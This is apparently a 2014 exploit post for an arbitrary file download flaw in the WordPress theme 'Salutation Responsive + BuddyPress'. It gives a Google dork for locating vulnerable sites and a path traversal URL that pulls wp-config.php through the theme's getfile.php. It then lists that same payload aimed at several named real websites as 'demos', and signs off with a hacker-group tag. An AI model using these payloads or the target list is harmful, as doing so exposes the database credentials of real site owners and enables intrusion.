facebook facebook twitter rss

WordPress theme Salutation Responsive + BuddyPress Theme Arbitrary File Download Vulnerability .

Author: Pro_Mast3r , Published: 04-11-2014
# WordPress theme Salutation Responsive + BuddyPress Theme  Arbitrary File Download Vulnerability .


# Author: Pro_Mast3r .



# Date: 2014/11/2


# Google Dork: inurl:/wp-content/themes/parallelus-salutation/ .



# Author E-mail : Pro.Mast3r@hotmail.com .



# Category: webapps .



# platform: php


# Vendor: tess
|Theme Name: Salutation Responsive + BuddyPress Theme
|Theme URI: http://themeforest.net/item/salutation-responsive-wordpress-buddypress-theme/548199
|Author: Parallelus
|Author URI: http://para.llel.us/

#poc

http://127.0.0.1/wordpress/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php

# demo
http://www.scarabresearch.com/wp-content/themes/parallelus-salutation//framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
http://www.ioeti.org/wp-content/themes/parallelus-salutation//framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
http://londonschoolofphotography.net//wp-content/themes/parallelus-salutation//framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
http://www.patchingprotocol.com/wp-content/themes/parallelus-salutation//framework/utilities/download/getfile.php?file=../../../../../../wp-config.php
more ..
----
dont hack Taking the idea ;)
#exploit4arab
#IRAQ Cyber Army

Like us on Facebook :